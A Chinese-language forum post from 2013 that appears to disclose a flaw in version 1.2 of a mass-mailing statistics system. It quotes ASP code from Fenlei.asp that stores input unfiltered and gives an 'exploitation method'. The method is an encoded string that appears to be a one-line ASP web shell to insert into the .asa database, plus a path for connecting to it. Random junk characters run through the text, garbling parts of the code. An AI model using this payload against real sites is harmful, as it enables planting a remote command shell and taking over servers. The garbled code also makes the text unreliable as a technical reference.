找回密码
 立即注册
查看: 2551|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
  q1 Z+ Q& u0 h2 ]# r. S8 M- ~
) S4 S7 P8 R2 Y# U% a. q- f; tIF Request.QueryString("Action")="del" Then
) ^6 n' |7 }4 J8 QID=Request.QueryString("ID")
% F" ^: |& s: ~' ]8 y, @" }IF Countss ("tui","Fenlei",ID )<>0 then
0 N6 D/ B( A& d4 K'略 ' h  Q$ T" {$ l1 }0 v0 z& l- A
IF Request.QueryString("Action")="Add" Then # s, F$ m1 a" n
Tname=Request.Form("Typename") 3 }6 X: u$ B  [; g
Set Rs=Server.CreateObject("adodb.Recordset")
( a  g, U5 [( o  M# J" xSql="Select * From Fenlei Order by id Desc " 7 m$ z. |$ s8 z( S" j- M3 g
Rs.Open Sql,Conn,1,3
7 I) |$ N6 E! e* f& nRs.Addnew 5 x4 O) k8 x0 d# H2 ~
Rs("Typename")=Tname $ R5 m9 T8 s8 ~) e: y4 h$ G+ R
'略 ; e" l3 u3 l: @  C4 }
Set Rs=Server.CreateObject("adodb.Recordset")
) b8 S4 J4 i: F' |Sql="Select * From Fenlei Order by id Desc "
7 a( y7 I' X8 H+ |1 [Rs.Open Sql,Conn,1,1 2 v" ^9 [5 C1 G+ X: p9 b" E" o
'略 ) s5 o3 ]+ x- w5 l# R& [4 i3 |: B1 M
%>
9 C3 A2 h! C# }( m $ D8 }- a  ]" l% W
/ S' U+ Y$ j1 H1 s( }, R# W: x
: _+ K3 B9 c% U; f
没有过滤,直接写入数据库。6 p/ g$ c) v  V2 j9 J. n
/ J2 f2 P) [$ G- N' y
利用方法:
6 u% r- y1 H: K; _' T* _
6 N+ o$ n: D4 r5 |插入:┼攠數畣整爠煥敵瑳∨≡┩>
& a; O$ \* r0 H8 y( B
  W; o9 K) P3 o* p6 ^ # U5 c: R/ k9 y( X( }: E8 q& v/ `
连接: http://www.xxx.com/###tongbaner.asa
; f3 Q* m# ^" k' T'默认安装文件: ! T4 l% H  d$ L7 Z$ m, }/ O
'install.asp$ x8 \0 q0 k3 G/ V, W# |( E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表